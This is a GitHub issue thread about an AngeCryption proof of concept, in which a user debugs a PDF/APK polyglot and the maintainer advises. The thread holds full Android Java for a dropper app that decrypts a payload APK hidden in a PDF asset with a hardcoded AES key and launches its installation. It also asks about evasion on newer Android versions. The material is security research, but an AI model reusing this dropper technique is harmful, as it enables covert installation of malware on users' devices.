### ISSUE TITLE
There was a problem parsing the package when done with PDF version of the project.

### ISSUE THREAD

**Issue by samaramirza** [cryptax/angeapk#4]
Hey, when I try to implement this project with pdf, everything goes smooth except that the payload couldn't be installed, the error being there was a problem parsing the package.
I have implemented the same version of the wrapping apk as for the png and jpg. Should I assume that the error is indeed in this part?
Kindly help.
I shall be obliged.
Regards

**Comment by cryptax** [comment]
Could you provide logs of what is failing?

**Comment by samaramirza** [comment]
Here is my java code for this:
May be I am not reading the pdf file correctly.
Can you look into this?
package com.fortiguard.poc.angecrypt;

import android.widget.TextView;
import android.widget.Button;
import android.view.View;
import android.app.Activity;
import android.os.Bundle;
import android.content.res.AssetManager;
import java.io.*;
import android.content.Intent;
import android.net.Uri;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.SecretKeySpec;
import javax.crypto.spec.IvParameterSpec;
import android.widget.Toast;
import android.util.Log;
import android.content.Context;
import android.os.Environment;
import android.widget.ImageView;
import android.graphics.drawable.Drawable;

public class PocActivity extends Activity
{
    public TextView txtView = null;
    public ImageView mImage = null;
    //public PDFView p = null;

    // full path name for decrypted APK: e.g /storage/sdcard/hidden.apk
    public static final String PAYLOAD_APK = Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_DOWNLOADS) + "/name.apk";

    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState)    {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);

        txtView = (TextView) findViewById(R.id.txtView);
        Button goBtn = (Button) findViewById(R.id.goBtn);
        mImage = (ImageView)findViewById(R.id.image);
        //p=(PDFView)findViewById(R.id.pdfView);
        // display the png
        try {
            InputStream ims = getAssets().open("anakin.jpg");
            Drawable d = Drawable.createFromStream(ims, null);
            mImage.setImageDrawable(d);
            Log.i("PoC", "Image displayed");
        }
        catch(IOException exp) {
            Log.e("PoC", "Image display exception caught: "+exp.toString());
            exp.printStackTrace();
            txtView.setText("An error occurred :(");
        }

        // do the job when the GO button is pressed
        goBtn.setOnClickListener(new View.OnClickListener()         {
            public void onClick(View v)             {
                try {
                    Log.i("PoC", "reading asset...");
                    byte [] png = readAsset("VED.pdf");

                    // decrypting
                    String key = "Anakin= DarkSide";
                    byte [] iv = { (byte) 0xef,(byte) 0x42,(byte) 0xd2,(byte) 0xd3,
                            (byte) 0xdb,(byte) 0x7b,(byte) 0x89,(byte) 0xa7,
                            (byte) 0x97,(byte) 0x42,(byte) 0x5e,(byte) 0x22,
                            (byte) 0x23,(byte) 0xe1,(byte) 0xd0,(byte) 0x57 };


                    Log.i("PoC", "decrypting asset...");
                    byte [] decrypted = decrypt(key.getBytes(), iv, png);

                    // dumping the decrypted asset
                    Log.i("PoC", "writing decrypted asset to: "+PocActivity.PAYLOAD_APK);
                    writeFile(decrypted, PocActivity.PAYLOAD_APK);

                    // installing it
                    Log.i("PoC", "installing apk...");
                    installApk(PocActivity.PAYLOAD_APK);

                    Log.i("PoC", "done");
                    txtView.setText("The hidden APK has been installed!");
                }
                catch(Exception exp) {
                    Log.e("PoC", "Exception caught: "+exp.toString());
                    exp.printStackTrace();
                    txtView.setText("An error occurred :(");
                }
            }
        });
    }

    public byte [] readAsset(String filename) throws IOException {
        AssetManager assetmanager = getAssets();
        InputStream in = assetmanager.open(filename);
        int size = in.available();
        byte[] buffer = new byte[size];
        in.read(buffer);
        in.close();
        return buffer;
    }

    public void writeFile(byte [] array, String filename) throws Exception {
        File myFile = new File(filename);
        myFile.createNewFile();
        FileOutputStream fout = new FileOutputStream(myFile);
        fout.write(array, 0, array.length);
        fout.close();
    }

    public void installApk(String filename) {
        Intent intent =new Intent(Intent.ACTION_VIEW);
        Log.i("PoC", "File: "+filename);
        //	intent.setClassName("com.fortiguard.hidestr", "com.fortiguard.hidestr.HideString");
        intent.setDataAndType(Uri.fromFile(new File(filename)), "application/vnd.android.package-archive");
        //	intent.setPackage("com.fortiguard.hidestr");
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        Log.i("PoC", "Intent is: "+intent.toString());
        startActivity(intent);
    }

    private static byte[] decrypt(byte[] keyBytes,
                                  byte [] iv,
                                  byte[] ciphertext) throws Exception {
        IvParameterSpec ivspec = new IvParameterSpec(iv);
        SecretKeySpec sk = new SecretKeySpec(keyBytes, "AES");
        Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");
        cipher.init(Cipher.DECRYPT_MODE, sk, ivspec);
        byte[] decrypted = cipher.doFinal(ciphertext);
        return decrypted;
    }

}

**Comment by samaramirza** [comment]
Also Can this PDF version work on latest versions of Android, may be atleast Lollipop?

**Comment by cryptax** [comment]
Ok, I now understand your first comment. You are implementing the "same" but with JPG and PDF.
First, you should check your polyglot works.
The format of JPG and PDF are different from PNG and APK. So just changing the file extension in scripts won't be enough! You've got to play with file formats, you can find more information on that on Ange [Albertini's github](https://github.com/corkami).

**Comment by samaramirza** [comment]
No, I have just changed the format from PNG to PDF, payload is still an APK.

I want to ask can this combination of PDF and apk work on latest versions?

**Comment by samaramirza** [comment]
Also the polyglot works.

**Comment by samaramirza** [comment]
I am basically implementing PDF/APK polyglot.

**Comment by cryptax** [comment]
Ok. So you have a working PDF/APK polyglot.
The issue is just in the wrapping APK.

Note you are displaying a JPG, not your PDF. 
```java
InputStream ims = getAssets().open("anakin.jpg");
...
byte [] png = readAsset("VED.pdf");
```

The code is okay - you've edited the key and IV to your needs, right?

>Could you provide logs of what is failing?

As I said, I'd need the logs. `adb logcat` will show where it is failing and will probably help you out.

>Also Can this PDF version work on latest versions of Android, may be atleast Lollipop?

The PoC used to work on Android 4.4.2, but it was fixed later by the Android Security team.
Lolipop is 5.0. I'm not sure if it had been fixed yet. If the dexClass load fails in the `adb logcat`, probably means it was fixed. You'll see from adb logcat what is the issue.
